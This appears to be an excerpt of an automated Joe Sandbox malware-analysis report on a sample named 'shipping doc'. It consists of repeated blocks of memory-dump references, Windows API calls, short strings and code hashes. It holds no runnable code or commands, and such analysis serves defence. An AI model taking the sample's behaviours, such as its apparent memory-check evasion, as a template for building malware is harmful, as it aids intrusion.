                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 81a9d5d9dbae0a6ec7946733cd73688509221c30ca035285cacc1ebfee8b1e38
                                                                                              • Instruction ID: cf39250026b767f00d24f1d5859545affa10e729d56aae77973a84856239f620
                                                                                              • Opcode Fuzzy Hash: 81a9d5d9dbae0a6ec7946733cd73688509221c30ca035285cacc1ebfee8b1e38
                                                                                              • Instruction Fuzzy Hash: 6DE01AB4800204DFCB41AFA0E848A6DBBB2FB08310F208059F80AE7750CB3859C1AF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 0013D86C
                                                                                              • GetDC.USER32(00000000), ref: 0013D876
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0013D882
                                                                                              • ReleaseDC.USER32(?), ref: 0013D8A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 0134d8476dc5d8338262e96d8a45ef34a15d7dbc9d49f370607cfb3ada93179f
                                                                                              • Instruction ID: 8f61553948aa0e42252a9b3c3576497196671dedb7ef486827b6f5d7d4caa9e9
                                                                                              • Opcode Fuzzy Hash: 0134d8476dc5d8338262e96d8a45ef34a15d7dbc9d49f370607cfb3ada93179f
                                                                                              • Instruction Fuzzy Hash: 6DE09A75800204DFCB51AFA1D84866DBBB5BB08311B148459F95AE7750DB395981AF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E7620: _wcslen.LIBCMT ref: 000E7625
                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00154ED4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection_wcslen
                                                                                              • String ID: *$LPT
                                                                                              • API String ID: 1725874428-3443410124
                                                                                              • Opcode ID: f4eb0d55381986538eb68e744bfc2515a97063946a0b189231e4d93320c7811c
                                                                                              • Instruction ID: d9bbb08e1740f85844457b3e7c4f70e38a37c7f5b7ff757872fa12837330b226
                                                                                              • Opcode Fuzzy Hash: f4eb0d55381986538eb68e744bfc2515a97063946a0b189231e4d93320c7811c
                                                                                              • Instruction Fuzzy Hash: D8915F75A00244DFCB14DF58C484EAABBF1BF44308F198099E85A9F3A2D775ED89CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 0010E30D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 3213639722-2276729525
                                                                                              • Opcode ID: f1a773b38315c36c1c7dd70efaea3913e3c84099fa9fb3b91c95b04f894f30c6
                                                                                              • Instruction ID: 6df0f913f3e447c61fe93af8ec7643399ed1cffd5398b7d080f796266751e0ca
                                                                                              • Opcode Fuzzy Hash: f1a773b38315c36c1c7dd70efaea3913e3c84099fa9fb3b91c95b04f894f30c6
                                                                                              • Instruction Fuzzy Hash: 66514671A0D20696CB1E7725D9413FA3FF4AB50740F308DB8E0D6863E9EB748CD19A86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: a3ff3591377be16136da898227d673fa0aaf1a9e44870ea1821c8b8e30698e86
                                                                                              • Instruction ID: f2eb93e6efb17880b1169175af9f965b6a84b08867b3a57a0cfaf5b45d8bb69c
                                                                                              • Opcode Fuzzy Hash: a3ff3591377be16136da898227d673fa0aaf1a9e44870ea1821c8b8e30698e86
                                                                                              • Instruction Fuzzy Hash: F851123590038ADFDB29DF68C481AFE7BE4EF55310F244059E991AB2E1E7349D82DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 000FF2A2
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 000FF2BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: efb54d6f29b2ad0d29ec8f1e2e45cfdd91153e5eeeb2398b6748d1c9016d8293
                                                                                              • Instruction ID: b6529731c4d37cd4cf502e14d545c969c41ab312b1f12c8fb89e581c2edfd920
                                                                                              • Opcode Fuzzy Hash: efb54d6f29b2ad0d29ec8f1e2e45cfdd91153e5eeeb2398b6748d1c9016d8293
                                                                                              • Instruction Fuzzy Hash: C75128714087859FE320AF11E886BABBBF8FB84300F81485DF19951196EB718569CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001657E0
                                                                                              • _wcslen.LIBCMT ref: 001657EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                              • String ID: CALLARGARRAY
                                                                                              • API String ID: 157775604-1150593374
                                                                                              • Opcode ID: a4d0eda7bb1975e94c58a18c15b9ca8f29e6b05ddc57bb86d183bef9b7841cb5
                                                                                              • Instruction ID: 9344e1aacb9de406b21133a5e7bb76d43c2e2652cfeff256526c183ead6b138c
                                                                                              • Opcode Fuzzy Hash: a4d0eda7bb1975e94c58a18c15b9ca8f29e6b05ddc57bb86d183bef9b7841cb5
                                                                                              • Instruction Fuzzy Hash: 80419171E002099FCB14DFAAC8819FEBBBAFF59324F544069E505A7292E7709D91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0015D130
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0015D13A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_wcslen
                                                                                              • String ID: |
                                                                                              • API String ID: 596671847-2343686810
                                                                                              • Opcode ID: cd87cfff64160869b73d4bed26b18f146162e7f02e6d9a1a15073e769e44d706
                                                                                              • Instruction ID: c26500f886c34ad17f60948bb6eeb62f45d4f458f645f2660984a17aeef8536a
                                                                                              • Opcode Fuzzy Hash: cd87cfff64160869b73d4bed26b18f146162e7f02e6d9a1a15073e769e44d706
                                                                                              • Instruction Fuzzy Hash: 8E311B71D00109AFCF15EFA5DC85AEE7FB9FF18340F000059E815B6262DB31A946CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00173621
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0017365C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: 9b9a452d542ddbbeefbae4c6d747a8a5fdabb803f8cd4928e26b7fc222322e34
                                                                                              • Instruction ID: b3b52d72401e0e5cdfb8711827bbbeb20e610615583f0038670cc0b50f8be79b
                                                                                              • Opcode Fuzzy Hash: 9b9a452d542ddbbeefbae4c6d747a8a5fdabb803f8cd4928e26b7fc222322e34
                                                                                              • Instruction Fuzzy Hash: 38318B71100204AEDB149F28DC80EFB73B9FF98760F10C619F9A997280DB31AE81E760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0017461F
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00174634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 0d77d067e01fce49b54a5d0a9ab5e3c3672af700ee760851ce676fe897d707a8
                                                                                              • Instruction ID: ef382d2e829bc34d3a571adb514371022279cdd839cdb029bfabec9f741afc80
                                                                                              • Opcode Fuzzy Hash: 0d77d067e01fce49b54a5d0a9ab5e3c3672af700ee760851ce676fe897d707a8
                                                                                              • Instruction Fuzzy Hash: 44311874A01309AFDB14CFA9C991BDA7BB5FF49300F15816AE909AB351D770EA41CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001233A2
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000E3A04
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                              • String ID: Line:
                                                                                              • API String ID: 2289894680-1585850449
                                                                                              • Opcode ID: 4a7e99b6af21361f21506709241ac7a00657bb6199bf31c6c74dfc6d1c9f92d2
                                                                                              • Instruction ID: cfb5c25639a4b99e43a56184a4f8303d46e3e3fef0cf20173031872ba80d2597
                                                                                              • Opcode Fuzzy Hash: 4a7e99b6af21361f21506709241ac7a00657bb6199bf31c6c74dfc6d1c9f92d2
                                                                                              • Instruction Fuzzy Hash: 5631C671408384AEC325EB21DC49BDBB7D8AB44710F10492EF599A3492EF709788C7D2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0017327C
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00173287
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: f3e8f8898cf009e43215913092ff416c92750aa0f5276bbf34b988010825bdc8
                                                                                              • Instruction ID: 857577fe91c1e128668585a9964df44cfd0ea6b157b9793110a2d0ec265ea430
                                                                                              • Opcode Fuzzy Hash: f3e8f8898cf009e43215913092ff416c92750aa0f5276bbf34b988010825bdc8
                                                                                              • Instruction Fuzzy Hash: 7411B2713002087FEF259E54DC84EFB377AEB983A4F118128F92CA7292D7319D51A760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000E604C
                                                                                                • Part of subcall function 000E600E: GetStockObject.GDI32(00000011), ref: 000E6060
                                                                                                • Part of subcall function 000E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E606A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0017377A
                                                                                              • GetSysColor.USER32(00000012), ref: 00173794
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: a8e4fb7d8240d13d1855c0b652cbf51555f6fc82c05e5fd5384f18c57fba4807
                                                                                              • Instruction ID: a522db3da00fe8f62619e50335f0a93df89cfa97eb77323ff01e2e1c0b7201aa
                                                                                              • Opcode Fuzzy Hash: a8e4fb7d8240d13d1855c0b652cbf51555f6fc82c05e5fd5384f18c57fba4807
                                                                                              • Instruction Fuzzy Hash: 3A113AB2610209AFDF05DFB8CC45EEA7BB8FB08354F014918F969E3250D735E9519B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0015CD7D
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0015CDA6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: edc972bb7f24f7e41ab6035d0d5e0e7388d267ec59ec52076350ba6473e3ec80
                                                                                              • Instruction ID: 2c702f9519160ec978aa1f3c69ae235c2bbaa2b1a222e57a9c8f8e30caf7c8da
                                                                                              • Opcode Fuzzy Hash: edc972bb7f24f7e41ab6035d0d5e0e7388d267ec59ec52076350ba6473e3ec80
                                                                                              • Instruction Fuzzy Hash: 3E11A375205735BED7284EA68C45FE7BEB8EB127A5F00422AB929C6080D7609888D6F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 001734AB
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001734BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: b6128af838ad2fd7978eda4cd93722ecc02724e3f0951232cc67a8f1c056d63b
                                                                                              • Instruction ID: ce3dd5ebd2d382e47473e014ddcddf5e1c2f99078481e46ffb64d911bc4204ea
                                                                                              • Opcode Fuzzy Hash: b6128af838ad2fd7978eda4cd93722ecc02724e3f0951232cc67a8f1c056d63b
                                                                                              • Instruction Fuzzy Hash: 2A114F71100108AFEB164E64DC44AEB377AEB15774F508724FA7A971D0C772DD91A750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 00146CB6
                                                                                              • _wcslen.LIBCMT ref: 00146CC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: STOP
                                                                                              • API String ID: 1256254125-2411985666
                                                                                              • Opcode ID: 358f8419d90269baa354926a7c231c13943fcc617a6cb011e940e1bdb2cdd240
                                                                                              • Instruction ID: 803207b543994df75554f25067fb4dee7d742cd89d5e28aef32eac83b236d11c
                                                                                              • Opcode Fuzzy Hash: 358f8419d90269baa354926a7c231c13943fcc617a6cb011e940e1bdb2cdd240
                                                                                              • Instruction Fuzzy Hash: 15010432A005268BCB20AFFDCC808BF73B5EF667287500528E892A21A1EB31DC40C651
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 00143CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00143CCA
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00141D4C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: ca2dd83014c888a9ab32696e8162ba633c49a4e799b9b68b7697e9834c2f22f5
                                                                                              • Instruction ID: 93918f268cc2b10c586f0c38b4cea92f2cf840c15e4a34abd873827e404f33c5
                                                                                              • Opcode Fuzzy Hash: ca2dd83014c888a9ab32696e8162ba633c49a4e799b9b68b7697e9834c2f22f5
                                                                                              • Instruction Fuzzy Hash: 01012875A40214BBCB18FFE0CD55DFE7369EB12350B10091AF836673E2EB3059498660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
